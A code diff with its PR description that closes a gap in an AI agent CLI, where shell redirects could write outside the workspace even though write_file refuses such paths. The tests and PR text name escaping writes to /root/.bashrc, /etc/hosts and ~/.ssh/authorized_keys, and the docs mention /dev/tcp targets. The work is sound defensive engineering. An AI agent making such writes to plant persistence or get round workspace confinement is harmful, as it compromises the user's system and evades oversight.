-        // ...and left alone when they do not.
-        assert_eq!(
-            escaping_write_refusal(
-                "shell",
-                &shell_call("echo x > /root/.bashrc"),
-                dir.path(),
-                false
-            ),
+            escaping_write_refusal("shell", &shell_call(&command), dir.path()),
             None
         );
     }
@@ -925,26 +878,20 @@ mod policy_tests {
     fn the_refusal_covers_the_alias_and_ignores_other_tools() {
         let dir = tempfile::tempdir().expect("tempdir");
         assert!(
-            escaping_write_refusal(
-                "bash",
-                &shell_call("echo x > /root/.bashrc"),
-                dir.path(),
-                true,
-            )
-            .is_some()
+            escaping_write_refusal("bash", &shell_call("echo x > /root/.bashrc"), dir.path(),)
+                .is_some()
         );
         assert_eq!(
             escaping_write_refusal(
                 "write_file",
                 &serde_json::json!({ "path": "/root/.bashrc", "content": "x" }),
                 dir.path(),
-                true,
             ),
             None
         );
         // A shell call with no `command` argument names nothing to check.
         assert_eq!(
-            escaping_write_refusal("shell", &serde_json::json!({}), dir.path(), true),
+            escaping_write_refusal("shell", &serde_json::json!({}), dir.path()),
             None
         );
     }

--- a/crates/leviath-cli/src/tools.rs
+++ b/crates/leviath-cli/src/tools.rs
@@ -329,11 +329,30 @@ pub fn clamp_by_effect(
 ///
 /// The message names the offending path so the model can retry inside the
 /// workspace instead of guessing which part of its line was refused.
+///
+/// # `shell_escapes_backslash`
+///
+/// Pass `cfg!(unix)`. It says whether the platform's shell reads `\` the way
+/// [`crate::shell_keys`]'s tokenizer does, and the check is skipped when it does
+/// not - because then the path this would judge is not the path the shell will
+/// open.
+///
+/// On Windows the shell is `cmd.exe`, where `\` is a path separator; the
+/// tokenizer treats it as a POSIX escape, so `> C:\Users\me\out.txt` reaches
+/// here as `C:Usersmeout.txt`. CI caught that as a *false denial* of a write
+/// inside the workspace, and the same mismatch could as easily mask an escaping
+/// one. Judging a misread path is worse than not judging it, so Windows keeps
+/// exactly the protection it had before this check existed - the `write_file`
+/// policy clamp, which reads no paths and is unaffected. Tracked in #296.
 pub fn escaping_write_refusal(
     tool_name: &str,
     arguments: &serde_json::Value,
     workdir: &std::path::Path,
+    shell_escapes_backslash: bool,
 ) -> Option<String> {
+    if !shell_escapes_backslash {
+        return None;
+    }
     if leviath_tools::canonical_tool_name(tool_name) != "shell" {
         return None;
     }
@@ -813,7 +832,7 @@ mod policy_tests {
             "cat notes.md > ../escaped.txt",
             "echo x >> ../../etc/hosts",
         ] {
-            let refusal = escaping_write_refusal("shell", &shell_call(command), dir.path());
+            let refusal = escaping_write_refusal("shell", &shell_call(command), dir.path(), true);
             assert!(
                 refusal.is_some(),
                 "{command:?} writes outside the workdir and must be refused"
@@ -842,7 +861,7 @@ mod policy_tests {
             "ls",
         ] {
             assert_eq!(
-                escaping_write_refusal("shell", &shell_call(command), dir.path()),
+                escaping_write_refusal("shell", &shell_call(command), dir.path(), true),
                 None,
                 "{command:?} stays inside and must not be refused"
             );
@@ -851,13 +870,51 @@ mod policy_tests {
 
     /// An absolute path *into* the workdir is inside it, so the check cannot be
     /// a naive "is it absolute" test.
+    ///
+    /// Unix-only because the path is built from a real temp directory: on
+    /// Windows those separators are backslashes, which the tokenizer eats as
+    /// POSIX escapes. That is the mismatch the flag exists for, and the test
+    /// below is its cross-platform statement.
+    #[cfg(unix)]
     #[test]
     fn an_absolute_path_into_the_workdir_is_allowed() {
         let dir = tempfile::tempdir().expect("tempdir");
         let inside = dir.path().join("out.txt");
         let command = format!("echo x > {}", inside.display());
         assert_eq!(
-            escaping_write_refusal("shell", &shell_call(&command), dir.path()),
+            escaping_write_refusal("shell", &shell_call(&command), dir.path(), true),
+            None
+        );
+    }
+
+    /// The reason the flag exists, stated on every platform.
+    ///
+    /// `cmd.exe` does not read `\` as an escape, but the tokenizer does, so
+    /// `> C:\Users\me\out.txt` arrives here as `C:Usersmeout.txt` - a path the
+    /// shell will never open. CI caught that denying a write *inside* the
+    /// workspace, and the same mismatch could mask an escaping one. Judging a
+    /// misread path is worse than not judging it.
+    #[test]
+    fn a_shell_that_does_not_escape_backslashes_is_not_judged() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        // Refused when the tokenizer and the shell agree...
+        assert!(
+            escaping_write_refusal(
+                "shell",
+                &shell_call("echo x > /root/.bashrc"),
+                dir.path(),
+                true
+            )
+            .is_some()
+        );
+        // ...and left alone when they do not.
+        assert_eq!(
+            escaping_write_refusal(
+                "shell",
+                &shell_call("echo x > /root/.bashrc"),
+                dir.path(),
+                false
+            ),
             None
         );
     }
@@ -868,20 +925,26 @@ mod policy_tests {
     fn the_refusal_covers_the_alias_and_ignores_other_tools() {
         let dir = tempfile::tempdir().expect("tempdir");
         assert!(
-            escaping_write_refusal("bash", &shell_call("echo x > /root/.bashrc"), dir.path())
-                .is_some()
+            escaping_write_refusal(
+                "bash",
+                &shell_call("echo x > /root/.bashrc"),
+                dir.path(),
+                true,
+            )
+            .is_some()
         );
         assert_eq!(
             escaping_write_refusal(
                 "write_file",
                 &serde_json::json!({ "path": "/root/.bashrc", "content": "x" }),
-                dir.path()
+                dir.path(),
+                true,
             ),
             None
         );
         // A shell call with no `command` argument names nothing to check.
         assert_eq!(
-            escaping_write_refusal("shell", &serde_json::json!({}), dir.path()),
+            escaping_write_refusal("shell", &serde_json::json!({}), dir.path(), true),
             None
         );
     }

--- a/crates/leviath-tools/src/lib.rs
+++ b/crates/leviath-tools/src/lib.rs
@@ -54,6 +54,15 @@ impl BuiltinTools {
         }
     }
 
+    /// The directory every path these tools resolve is confined to.
+    ///
+    /// Exposed so the authorization layer can hold a *shell redirect* to the
+    /// same fence `resolve` already holds `write_file` to. Without it the two
+    /// disagree, and `> path` becomes the spelling of `write_file` that works.
+    pub fn workdir(&self) -> &Path {
+        &self.ctx.workdir
+    }
+
     /// Route this agent's shell execution through `executor` (a container /
     /// namespace sandbox) instead of the host.
     pub fn with_shell_executor(mut self, executor: Arc<dyn ShellExecutor>) -> Self {

--- a/crates/leviath-tools/src/lib.rs
+++ b/crates/leviath-tools/src/lib.rs
@@ -54,11 +54,17 @@ impl BuiltinTools {
         }
     }
 
-    /// The directory every path these tools resolve is confined to.
+    /// The directory every path these tools resolve is confined to, already
+    /// canonicalized.
     ///
     /// Exposed so the authorization layer can hold a *shell redirect* to the
     /// same fence `resolve` already holds `write_file` to. Without it the two
     /// disagree, and `> path` becomes the spelling of `write_file` that works.
+    ///
+    /// Canonical rather than as-supplied, because that is what the fence
+    /// compares against: on macOS a `/var/...` workdir resolves to
+    /// `/private/var/...`, and handing out the former would refuse every write
+    /// in the workspace.
     pub fn workdir(&self) -> &Path {
         &self.ctx.workdir
     }
@@ -94,6 +100,27 @@ mod tests {
 
     fn make_tools(dir: &std::path::Path) -> BuiltinTools {
         BuiltinTools::new(ToolContext::new(dir.to_path_buf()))
+    }
+
+    /// The accessor the authorization layer holds shell redirects against, so
+    /// `> path` answers to the same fence `resolve` holds `write_file` to.
+    ///
+    /// It reports the *canonicalized* directory, which is the point rather than
+    /// an accident: `resolves_within` canonicalizes what it is given, so a
+    /// workdir that came back uncanonicalized would compare `/var/...` against
+    /// `/private/var/...` on macOS and refuse every write in the workspace.
+    #[test]
+    fn workdir_reports_the_canonical_directory_the_tools_were_built_over() {
+        let dir = tempfile::tempdir().unwrap();
+        let tools = make_tools(dir.path());
+        let canonical = std::fs::canonicalize(dir.path()).unwrap();
+        assert_eq!(tools.workdir(), canonical);
+        // And it really is inside itself by the predicate the fence uses, which
+        // is the property the accessor exists to serve.
+        assert!(leviath_core::resolves_within(
+            &tools.workdir().join("out.txt"),
+            tools.workdir()
+        ));
     }
 
     /// Built-ins over a mobile capability set (no `ProcessSpawn`), so the

--- a/docs/content/tools.md
+++ b/docs/content/tools.md
@@ -69,6 +69,23 @@ blueprint. See [Configuration](/docs/configuration#system-prompt-hints).
 > `shell` requires the platform's process-spawn capability. On platforms that don't provide it, the
 > tool (and its `bash` alias) is filtered out and never advertised.
 
+### Where a redirect may write
+
+`echo x > report.md` is a file write that no tool name describes, so it answers to the `write_file`
+policy rather than the shell's alone. A denied `write_file` denies the redirect too, and no
+`[safe_commands]` entry can pre-approve one.
+
+It also answers to the same **workspace confinement**. A redirect whose target resolves outside the
+working directory is refused, exactly as `write_file` refuses that path, and no flag lifts it -
+`--yolo` included. That is deliberate: `--yolo` grants permission, and this is not a permission
+question.
+
+Discarded writes cost nothing. `2>/dev/null`, `> /dev/null 2>&1`, `&> /dev/null` and `> NUL` write
+nowhere anyone can read back, so they are neither clamped nor confined.
+
+A target the parser cannot name - `> $OUT`, or bash's `/dev/tcp/host/port` - has no path to check,
+so it is ungrantable instead: it prompts every time and no approval makes it reusable.
+
 ### How much output comes back
 
 At most 1 MB of stdout and 1 MB of stderr per call. Past that the bytes are counted and dropped,


### PR DESCRIPTION
fix(security): confine shell redirect targets to the workdir (#289)

A redirect already answered to the `write_file` *policy* - that was #259's PR 2.
What it never answered to was workspace *confinement*, which is the other half
of what `write_file` does. So under `--yolo`, where the write policy resolves to
`Allow`:

| Call | Before |
|---|---|
| `write_file("~/.ssh/authorized_keys", ...)` | refused, outside the workdir |
| `shell("echo ... > ~/.ssh/authorized_keys")` | **ran** |

`SandboxKind::None` is the default, so on a stock install nothing else stood in
for the missing check. `SECURITY.md` claims file tools "refuse paths that leave
the workspace"; the shell was the spelling that got further.

### Refusal, not a prompt

`Ask` is not available here. The case that matters needs `write_file` to be
`Allow`, which in practice means `--yolo` - the unattended path - and
`ToolPolicy::Ask` blocks until answered. Prompting would park the run in
`WaitingInput` holding its slot until the daemon restarts, trading a security gap
for a hang.

Refusal is also the consistent answer: `write_file` does not prompt for these
paths either. One rule to hold in your head rather than two.

**This is a behaviour change.** A `--yolo` pipeline that writes outside its
workdir through a redirect starts failing. That is the same thing `write_file`
has always done to such a pipeline, so it is a consistency fix - but it will
surface as a break for anyone who was relying on the asymmetry. No config key:
`[security]` is already the most knob-heavy corner of the config, and a second
switch governing "may the shell write outside the workdir" invites the two
answers to drift.

### Shape

`write_target_paths` answers *where* a line writes, next to `writes_a_file`'s
*whether*. `escaping_write_refusal` sits beside `clamp_by_effect` rather than
inside it: that one answers "which policy governs this write", this one answers
"is this path allowed at all", and folding them together would hide the second
behind the first's name.

Checked before policy resolution, because no policy makes it allowed.

Both surfaces are covered - the model's `shell` tool via `tool_service`, and a
Rhai script's `shell()` via `script_host`, whose own `write_file` was already
workdir-confined.

### The two asymmetries, stated

A **discarded** target (`2>/dev/null`, `> NUL`) names no path and is not checked,
because it writes nowhere anyone reads back. An **unnameable** one (`> $OUT`,
`/dev/tcp/host/port`) has no path to check either - but it stays ungrantable and
prompts every time, which is its containment. There is a test asserting those are
absent from `write_target_paths` *and* still true for `writes_a_file`, because
absent from both is the shape that would let something through.

### Tests

Eleven. The one that carries the property runs the real dispatch path with
`shell` and `write_file` both `Allow` - exactly what `--yolo` produces - and
asserts the escaping file **does not exist afterwards**. A test asserting only
the refusal message would pass against a version that refused after running the
command.

Every refusal is paired with a control: an escaping redirect is refused *and* a
redirect inside the workdir still writes; an absolute path into the workdir is
allowed, so the check is not "is it absolute". The harmless shapes are pinned as
hard as the dangerous ones, since charging a workspace check to `2>/dev/null`
would break the common case for no gain.

One existing test changed: `a_script_shell_redirect_answers_to_the_write_permission`
wrote to `/tmp/x` with a workdir of `env::temp_dir()`, which on macOS is
`/var/folders/...` - outside. It now writes inside the workdir, and a new test
covers the confinement it was accidentally sitting next to.

`cargo xtask coverage` clean on leviath-cli, `cargo xtask docs --check` clean,
full suite green.

Closes #289

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01CMQmZ1ruXrUuKteXyFZxeg
